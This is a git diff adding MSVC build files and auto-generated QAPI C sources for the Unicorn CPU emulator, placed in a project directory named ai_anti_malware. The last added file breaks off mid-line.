xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{00b0caab-f50f-47a1-99ea-a452f1e712e3}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{f666e049-ed32-4817-9998-b6898ce2b71a}</UniqueIdentifier> + </Filter> + <Filter Include="hw\mips"> + <UniqueIdentifier>{b2a1fb8b-789a-45a6-a814-9312ad75bd70}</UniqueIdentifier> + </Filter> + <Filter Include="target-mips"> + <UniqueIdentifier>{e6bea1c8-7307-44c8-9956-25321f73287f}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{cce3d221-0ae7-4cea-a9bd-5fe10a932c20}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{9b5981d1-89fd-4210-ac4d-7b3dab34871b}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\cpu-qom.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\mipsel.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\mips_r4k.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\cpu.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\lmi_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/prebuild_script.bat b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/prebuild_script.bat new file mode 100644 index 0000000..417682a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/prebuild_script.bat @@ -0,0 +1,21 @@ +del ..\..\qemu\qapi-types.h 2> null +del ..\..\qemu\qapi-types.c 2> null + +del ..\..\qemu\qapi-visit.h 2> null +del ..\..\qemu\qapi-visit.c 2> null + +del ..\..\qemu\config-host.h 2> null + +del ..\..\qemu\aarch-softmmu\config-target.h 2> null +del ..\..\qemu\aarcheb-softmmu\config-target.h 2> null +del ..\..\qemu\arm-softmmu\config-target.h 2> null +del ..\..\qemu\armeb-softmmu\config-target.h 2> null +del ..\..\qemu\m68k-softmmu\config-target.h 2> null +del ..\..\qemu\mips64el-softmmu\config-target.h 2> null +del ..\..\qemu\mips64-softmmu\config-target.h 2> null +del ..\..\qemu\mipsel-softmmu\config-target.h 2> null +del ..\..\qemu\mips-softmmu\config-target.h 2> null +del ..\..\qemu\sparc64-softmmu\config-target.h 2> null +del ..\..\qemu\sparc-softmmu\config-target.h 2> null +del ..\..\qemu\x86_64-softmmu\config-target.h 2> null +del null diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-types.c b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-types.c new file mode 100644 index 0000000..173c654 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-types.c @@ -0,0 +1,293 @@ +/* AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * deallocation functions for schema-defined QAPI types + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * Michael Roth <mdroth@linux.vnet.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qapi/dealloc-visitor.h" +#include "qapi-types.h" +#include "qapi-visit.h" + +const char *ErrorClass_lookup[] = { + "GenericError", + "CommandNotFound", + "DeviceEncrypted", + "DeviceNotActive", + "DeviceNotFound", + "KVMMissingCap", + NULL, +}; + +const char *X86CPURegister32_lookup[] = { + "EAX", + "EBX", + "ECX", + "EDX", + "ESP", + "EBP", + "ESI", + "EDI", + NULL, +}; + + +#ifndef QAPI_TYPES_BUILTIN_CLEANUP_DEF_H +#define QAPI_TYPES_BUILTIN_CLEANUP_DEF_H + + +void qapi_free_strList(strList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_strList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_intList(intList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_intList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_numberList(numberList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_numberList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_boolList(boolList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_boolList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int8List(int8List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_int8List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int16List(int16List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_int16List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int32List(int32List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_int32List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int64List(int64List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_int64List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint8List(uint8List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint8List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint16List(uint16List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint16List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint32List(uint32List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint32List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint64List(uint64List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint64List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +#endif /* QAPI_TYPES_BUILTIN_CLEANUP_DEF_H */ + + +void qapi_free_ErrorClassList(ErrorClassList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_ErrorClassList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + + +void qapi_free_X86CPURegister32List(X86CPURegister32List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_X86CPURegister32List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + + +void qapi_free_X86CPUFeatureWordInfoList(X86CPUFeatureWordInfoList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_X86CPUFeatureWordInfoList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + + +void qapi_free_X86CPUFeatureWordInfo(X86CPUFeatureWordInfo *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_X86CPUFeatureWordInfo(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-types.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-types.h new file mode 100644 index 0000000..944e882 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-types.h @@ -0,0 +1,228 @@ +/* AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI types + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QAPI_TYPES_H +#define QAPI_TYPES_H + +#include "unicorn/platform.h" + + +#ifndef QAPI_TYPES_BUILTIN_STRUCT_DECL_H +#define QAPI_TYPES_BUILTIN_STRUCT_DECL_H + + +typedef struct strList +{ + union { + char *value; + uint64_t padding; + }; + struct strList *next; +} strList; + +typedef struct intList +{ + union { + int64_t value; + uint64_t padding; + }; + struct intList *next; +} intList; + +typedef struct numberList +{ + union { + double value; + uint64_t padding; + }; + struct numberList *next; +} numberList; + +typedef struct boolList +{ + union { + bool value; + uint64_t padding; + }; + struct boolList *next; +} boolList; + +typedef struct int8List +{ + union { + int8_t value; + uint64_t padding; + }; + struct int8List *next; +} int8List; + +typedef struct int16List +{ + union { + int16_t value; + uint64_t padding; + }; + struct int16List *next; +} int16List; + +typedef struct int32List +{ + union { + int32_t value; + uint64_t padding; + }; + struct int32List *next; +} int32List; + +typedef struct int64List +{ + union { + int64_t value; + uint64_t padding; + }; + struct int64List *next; +} int64List; + +typedef struct uint8List +{ + union { + uint8_t value; + uint64_t padding; + }; + struct uint8List *next; +} uint8List; + +typedef struct uint16List +{ + union { + uint16_t value; + uint64_t padding; + }; + struct uint16List *next; +} uint16List; + +typedef struct uint32List +{ + union { + uint32_t value; + uint64_t padding; + }; + struct uint32List *next; +} uint32List; + +typedef struct uint64List +{ + union { + uint64_t value; + uint64_t padding; + }; + struct uint64List *next; +} uint64List; + +#endif /* QAPI_TYPES_BUILTIN_STRUCT_DECL_H */ + + +extern const char *ErrorClass_lookup[]; +typedef enum ErrorClass +{ + ERROR_CLASS_GENERIC_ERROR = 0, + ERROR_CLASS_COMMAND_NOT_FOUND = 1, + ERROR_CLASS_DEVICE_ENCRYPTED = 2, + ERROR_CLASS_DEVICE_NOT_ACTIVE = 3, + ERROR_CLASS_DEVICE_NOT_FOUND = 4, + ERROR_CLASS_KVM_MISSING_CAP = 5, + ERROR_CLASS_MAX = 6, +} ErrorClass; + +typedef struct ErrorClassList +{ + union { + ErrorClass value; + uint64_t padding; + }; + struct ErrorClassList *next; +} ErrorClassList; + +extern const char *X86CPURegister32_lookup[]; +typedef enum X86CPURegister32 +{ + X86_CPU_REGISTER32_EAX = 0, + X86_CPU_REGISTER32_EBX = 1, + X86_CPU_REGISTER32_ECX = 2, + X86_CPU_REGISTER32_EDX = 3, + X86_CPU_REGISTER32_ESP = 4, + X86_CPU_REGISTER32_EBP = 5, + X86_CPU_REGISTER32_ESI = 6, + X86_CPU_REGISTER32_EDI = 7, + X86_CPU_REGISTER32_MAX = 8, +} X86CPURegister32; + +typedef struct X86CPURegister32List +{ + union { + X86CPURegister32 value; + uint64_t padding; + }; + struct X86CPURegister32List *next; +} X86CPURegister32List; + + +typedef struct X86CPUFeatureWordInfo X86CPUFeatureWordInfo; + +typedef struct X86CPUFeatureWordInfoList +{ + union { + X86CPUFeatureWordInfo *value; + uint64_t padding; + }; + struct X86CPUFeatureWordInfoList *next; +} X86CPUFeatureWordInfoList; + +#ifndef QAPI_TYPES_BUILTIN_CLEANUP_DECL_H +#define QAPI_TYPES_BUILTIN_CLEANUP_DECL_H + +void qapi_free_strList(strList *obj); +void qapi_free_intList(intList *obj); +void qapi_free_numberList(numberList *obj); +void qapi_free_boolList(boolList *obj); +void qapi_free_int8List(int8List *obj); +void qapi_free_int16List(int16List *obj); +void qapi_free_int32List(int32List *obj); +void qapi_free_int64List(int64List *obj); +void qapi_free_uint8List(uint8List *obj); +void qapi_free_uint16List(uint16List *obj); +void qapi_free_uint32List(uint32List *obj); +void qapi_free_uint64List(uint64List *obj); + +#endif /* QAPI_TYPES_BUILTIN_CLEANUP_DECL_H */ + + +void qapi_free_ErrorClassList(ErrorClassList *obj); + +void qapi_free_X86CPURegister32List(X86CPURegister32List *obj); + +struct X86CPUFeatureWordInfo +{ + int64_t cpuid_input_eax; + bool has_cpuid_input_ecx; + int64_t cpuid_input_ecx; + X86CPURegister32 cpuid_register; + int64_t features; +}; + +void qapi_free_X86CPUFeatureWordInfoList(X86CPUFeatureWordInfoList *obj); +void qapi_free_X86CPUFeatureWordInfo(X86CPUFeatureWordInfo *obj); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-visit.c b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-visit.c new file mode 100644 index 0000000..7733bb5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-visit.c @@ -0,0 +1,428 @@ +/* THIS FILE IS AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI visitor functions + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qemu-common.h" +#include "qapi-visit.h" + +void visit_type_strList(Visitor *m, strList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + strList *native_i = (strList *)i; + visit_type_str(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_intList(Visitor *m, intList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + intList *native_i = (intList *)i; + visit_type_int(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_numberList(Visitor *m, numberList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + numberList *native_i = (numberList *)i; + visit_type_number(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_boolList(Visitor *m, boolList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + boolList *native_i = (boolList *)i; + visit_type_bool(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int8List(Visitor *m, int8List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int8List *native_i = (int8List *)i; + visit_type_int8(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int16List(Visitor *m, int16List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int16List *native_i = (int16List *)i; + visit_type_int16(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int32List(Visitor *m, int32List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int32List *native_i = (int32List *)i; + visit_type_int32(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int64List(Visitor *m, int64List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int64List *native_i = (int64List *)i; + visit_type_int64(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_uint8List(Visitor *m, uint8List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint8List *native_i = (uint8List *)i; + visit_type_uint8(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_uint16List(Visitor *m, uint16List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint16List *native_i = (uint16List *)i; + visit_type_uint16(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_uint32List(Visitor *m, uint32List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint32List *native_i = (uint32List *)i; + visit_type_uint32(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_uint64List(Visitor *m, uint64List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint64List *native_i = (uint64List *)i; + visit_type_uint64(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_ErrorClassList(Visitor *m, ErrorClassList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + ErrorClassList *native_i = (ErrorClassList *)i; + visit_type_ErrorClass(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_ErrorClass(Visitor *m, ErrorClass *obj, const char *name, Error **errp) +{ + visit_type_enum(m, (int *)obj, ErrorClass_lookup, "ErrorClass", name, errp); +} + +void visit_type_X86CPURegister32List(Visitor *m, X86CPURegister32List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + X86CPURegister32List *native_i = (X86CPURegister32List *)i; + visit_type_X86CPURegister32(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_X86CPURegister32(Visitor *m, X86CPURegister32 *obj, const char *name, Error **errp) +{ + visit_type_enum(m, (int *)obj, X86CPURegister32_lookup, "X86CPURegister32", name, errp); +} + +static void visit_type_X86CPUFeatureWordInfo_fields(Visitor *m, X86CPUFeatureWordInfo **obj, Error **errp) +{ + Error *err = NULL; + visit_type_int(m, &(*obj)->cpuid_input_eax, "cpuid-input-eax", &err); + if (err) { + goto out; + } + visit_optional(m, &(*obj)->has_cpuid_input_ecx, "cpuid-input-ecx", &err); + if (!err && (*obj)->has_cpuid_input_ecx) { + visit_type_int(m, &(*obj)->cpuid_input_ecx, "cpuid-input-ecx", &err); + } + if (err) { + goto out; + } + visit_type_X86CPURegister32(m, &(*obj)->cpuid_register, "cpuid-register", &err); + if (err) { + goto out; + } + visit_type_int(m, &(*obj)->features, "features", &err); + if (err) { + goto out; + } + +out: + error_propagate(errp, err); +} + +void visit_type_X86CPUFeatureWordInfo(Visitor *m, X86CPUFeatureWordInfo **obj, const char *name, Error **errp) +{ + Error *err = NULL; + + visit_start_struct(m, (void **)obj, "X86CPUFeatureWordInfo", name, sizeof(X86CPUFeatureWordInfo), &err); + if (!err) { + if (*obj) { + visit_type_X86CPUFeatureWordInfo_fields(m, obj, errp); + } + visit_end_struct(m, &err); + } + error_propagate(errp, err); +} + +void visit_type_X86CPUFeatureWordInfoList(Visitor *m, X86CPUFeatureWordInfoList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + X86CPUFeatureWordInfoList *native_i = (X86CPUFeatureWordInfoList *)i; + visit_type_X86CPUFeatureWordInfo(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-visit.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-visit.h new file mode 100644 index 0000000..51bd088 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-visit.h @@ -0,0 +1,51 @@ +/* THIS FILE IS AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI visitor functions + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QAPI_VISIT_H +#define QAPI_VISIT_H + +#include "qapi/visitor.h" +#include "qapi-types.h" + + +#ifndef QAPI_VISIT_BUILTIN_VISITOR_DECL_H +#define QAPI_VISIT_BUILTIN_VISITOR_DECL_H + +void visit_type_strList(Visitor *m, strList **obj, const char *name, Error **errp); +void visit_type_intList(Visitor *m, intList **obj, const char *name, Error **errp); +void visit_type_numberList(Visitor *m, numberList **obj, const char *name, Error **errp); +void visit_type_boolList(Visitor *m, boolList **obj, const char *name, Error **errp); +void visit_type_int8List(Visitor *m, int8List **obj, const char *name, Error **errp); +void visit_type_int16List(Visitor *m, int16List **obj, const char *name, Error **errp); +void visit_type_int32List(Visitor *m, int32List **obj, const char *name, Error **errp); +void visit_type_int64List(Visitor *m, int64List **obj, const char *name, Error **errp); +void visit_type_uint8List(Visitor *m, uint8List **obj, const char *name, Error **errp); +void visit_type_uint16List(Visitor *m, uint16List **obj, const char *name, Error **errp); +void visit_type_uint32List(Visitor *m, uint32List **obj, const char *name, Error **errp); +void visit_type_uint64List(Visitor *m, uint64List **obj, const char *name, Error **errp); + +#endif /* QAPI_VISIT_BUILTIN_VISITOR_DECL_H */ + + +void visit_type_ErrorClass(Visitor *m, ErrorClass *obj, const char *name, Error **errp); +void visit_type_ErrorClassList(Visitor *m, ErrorClassList **obj, const char *name, Error **errp); + +void visit_type_X86CPURegister32(Visitor *m, X86CPURegister32 *obj, const char *name, Error **errp); +void visit_type_X86CPURegister32List(Visitor *m, X86CPURegister32List **obj, const char *name, Error **errp); + +void visit_type_X86CPUFeatureWordInfo(Visitor *m, X86CPUFeatureWordInfo **obj, const char *name, Error **errp); +void visit_type_X86CPUFeatureWordInfoList(Visitor *m, X86CPUFeatureWordInfoList **obj, const char *name, Error **errp); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/config-target.h new file mode 100644 index 0000000..3702f2f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/config-target.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_SPARC 1 +#define 